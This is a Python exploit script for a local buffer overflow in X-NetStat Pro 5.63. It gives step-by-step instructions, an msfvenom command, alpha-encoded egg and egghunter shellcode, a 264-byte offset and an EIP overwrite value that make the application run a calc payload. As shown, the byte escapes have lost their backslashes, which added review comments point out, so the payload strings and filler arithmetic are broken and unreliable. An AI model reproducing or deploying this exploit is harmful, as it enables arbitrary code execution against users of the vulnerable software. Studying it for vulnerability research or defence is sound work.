#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even simpler ways to trigger this vulnerability, #
# the EggHunter technique is used here so that the same approach runs on different Windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depending on your Windows version) into "Run Program" --> Ok #
# --> Wait a little --> Shellcode (Calc) opens #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depending on your Windows version) into "IP List (One IP per Line)" --> #
# Then press the Open File (folder) icon --> Wait a little --> Shellcode (Calc) opens #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------ EGG Shellcode Generation ---------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
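# "Egg" = the 8-character tag the hunter scans memory for ("w00tw00t", see the
# comment above) followed by the alpha_mixed-encoded payload produced by the
# msfvenom command above. Because the hunter only succeeds when this exact tag
# is resident in the process, the tag itself can serve as a memory-scan / IoC
# signature for defenders.
egg = "w00tw00t"
egg += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
egg += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
egg += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
egg += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
egg += "x79x6cx5ax48x4ex62x77x70x57x70x63x30x71"
egg += "x70x4bx39x5ax45x35x61x4fx30x52x44x4cx4b"
egg += "x52x70x46x50x6cx4bx53x62x54x4cx6cx4bx43"
egg += "x62x44x54x6cx4bx71x62x51x38x34x4fx6ex57"
egg += "x31x5ax36x46x55x61x6bx4fx4cx6cx37x4cx75"
egg += "x31x73x4cx45x52x54x6cx77x50x49x51x48x4f"
egg += "x34x4dx53x31x69x57x39x72x4ax52x62x72x43"
egg += "x67x6ex6bx71x42x52x30x4cx4bx70x4ax47x4c"
egg += "x6ex6bx62x6cx62x31x72x58x6ax43x70x48x33"
egg += "x31x4ex31x52x71x4cx4bx36x39x37x50x63x31"
egg += "x5ax73x4cx4bx42x69x52x38x68x63x57x4ax31"
egg += "x59x4ex6bx44x74x4cx4bx55x51x38x56x50x31"
egg += "x6bx4fx6ex4cx69x51x78x4fx46x6dx36x61x58"
egg += "x47x46x58x4bx50x52x55x39x66x65x53x71x6d"
egg += "x79x68x45x6bx31x6dx45x74x34x35x7ax44x52"
egg += "x78x4cx4bx62x78x77x54x47x71x58x53x75x36"
egg += "x6cx4bx34x4cx70x4bx6cx4bx52x78x35x4cx43"
egg += "x31x58x53x6cx4bx73x34x6ex6bx67x71x58x50"
egg += "x6cx49x73x74x45x74x55x74x63x6bx61x4bx33"
egg += "x51x32x79x51x4ax36x31x49x6fx4bx50x71x4f"
egg += "x71x4fx42x7ax6cx4bx44x52x48x6bx6ex6dx31"
egg += "x4dx50x6ax35x51x6ex6dx6fx75x48x32x55x50"
egg += "x75x50x53x30x46x30x55x38x74x71x4cx4bx72"
egg += "x4fx4ex67x69x6fx6bx65x4dx6bx5ax50x38x35"
egg += "x79x32x56x36x45x38x59x36x6ax35x6fx4dx6f"
egg += "x6dx69x6fx59x45x35x6cx64x46x31x6cx76x6a"
egg += "x4bx30x79x6bx4bx50x74x35x73x35x4dx6bx73"
egg += "x77x65x43x71x62x32x4fx50x6ax75x50x31x43"
egg += "x39x6fx5ax75x55x33x43x51x72x4cx45x33x44"
egg += "x6ex62x45x31x68x62x45x63x30x41x41"

# NOTE(review): the backslashes of the "\x.." escapes appear to have been
# stripped when this listing was extracted; as shown, the lines above are
# literal ASCII text, so the file written here does not hold the author's
# intended bytes.
# Write the egg to egg.txt in the working directory. `with` guarantees the
# handle is closed even if write() raises.
with open("egg.txt", "w") as f:
    f.write(egg)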

#--------------------------------- EGG Hunter Shellcode Generation -----------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
# Alpha-only encoding of the mona-generated egghunter (see the comment above;
# it looks for the "w00tw00t" tag). Used for the Windows XP / Windows 7 files.
# Assembled here as a single implicitly-concatenated string literal.
egghunter = (
    "x4cx4cx4cx4cx5f"
    "x57x59x49x49x49x49x49x49x49x49x49x49"
    "x49x49x49x49x49x49x37x51x5ax6ax41x58"
    "x50x30x41x35x41x6bx41x46x51x32x41x47"
    "x32x42x47x30x42x47x41x42x58x50x38x41"
    "x47x75x4ax49x56x51x6bx62x75x36x4ex6c"
    "x48x4bx6bx30x59x6bx34x63x64x35x33x38"
    "x45x61x49x4bx36x33x50x53x70x53x43x63"
    "x38x33x6fx30x43x56x4ex61x48x4ax79x6f"
    "x44x4fx30x42x72x72x6bx30x59x6bx39x50"
    "x30x74x67x78x52x4ax77x72x50x58x48x4d"
    "x56x4ex71x4ax7ax4bx35x42x70x6ax67x56"
    "x42x78x56x51x6bx79x6fx79x68x62x72x44"
    "x59x6fx67x63x62x7ax6bx33x45x6cx57x54"
    "x75x50x62x54x67x71x31x4ax75x6cx67x75"
    "x74x34x38x56x4fx48x44x37x30x30x74x70"
    "x31x64x6cx49x4ax77x6ex4fx64x35x68x51"
    "x6cx6fx33x45x48x4ex59x6fx6dx37x41x41"
)

# EggHunter - Modified Version for Windows10 (32-64 bit)
# Alpha-only encoding of the egghunter variant the author prepared for
# Windows 10 (it looks for the same "w00tw00t" tag). Assembled here as a
# single implicitly-concatenated string literal.
egghunter10 = (
    "x4cx4cx4cx4cx5f"
    "x57x59x49x49x49x49x49x49x49x49x49"
    "x49x49x49x49x49x49x49x37x51x5ax6a"
    "x41x58x50x30x41x35x41x6bx41x46x51"
    "x32x41x47x32x42x47x30x42x47x41x42"
    "x58x50x38x41x47x75x4ax49x4dx53x4a"
    "x4cx46x50x69x57x56x64x76x44x55x50"
    "x37x70x55x50x73x30x48x47x43x74x55"
    "x74x35x54x57x70x47x70x35x50x65x50"
    "x78x47x67x34x77x54x76x68x35x50x55"
    "x50x53x30x45x50x66x51x4ax72x61x76"
    "x4cx4cx58x4bx6fx70x6bx4bx61x33x50"
    "x75x63x32x4cx73x4fx30x70x66x4bx31"
    "x6ax6ax49x6fx64x4fx62x62x73x62x4d"
    "x50x69x6bx79x50x30x74x64x4bx53x58"
    "x6bx76x63x31x75x50x37x70x70x58x5a"
    "x6dx54x6ex52x7ax68x6bx67x61x30x31"
    "x49x4bx73x63x51x43x30x53x32x4ax71"
    "x39x63x68x38x33x49x50x51x74x69x6f"
    "x66x73x6dx53x7ax64x66x6cx42x7ax55"
    "x6cx47x75x71x64x49x44x78x38x72x57"
    "x66x50x74x70x31x64x4fx79x4bx67x4c"
    "x6fx70x75x78x4fx6ex4fx44x35x48x4c"
    "x6bx4fx68x67x41x41"
)

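# Value placed at the EIP overwrite (the author's "Direct Eip Overflow"); the
# 264 below is the author's offset from the start of the field to that slot.
eip = "x77x5ax46"

# Each file = hunter + "x41" filler up to the offset + EIP value.
# NOTE(review): the filler term assumes one character per "\xNN" escape. With
# the escapes shown as literal text, len() counts three characters per byte,
# 264 - len(...) goes negative, and "x41" * <negative> is "", so no filler is
# emitted in this copy of the listing.
buffer = egghunter + "x41" * (264 - len(egghunter)) + eip  # Direct Eip Overflow

# `with` closes each handle even if write() raises; names f / f2 are kept so
# the module-level namespace matches the original script.
with open("egghunter-winxp-win7.txt", "w") as f:
    f.write(buffer)

buffer = egghunter10 + "x41" * (264 - len(egghunter10)) + eip  # Direct Eip Overflow
with open("egghunter-win10.txt", "w") as f2:
    f2.write(buffer)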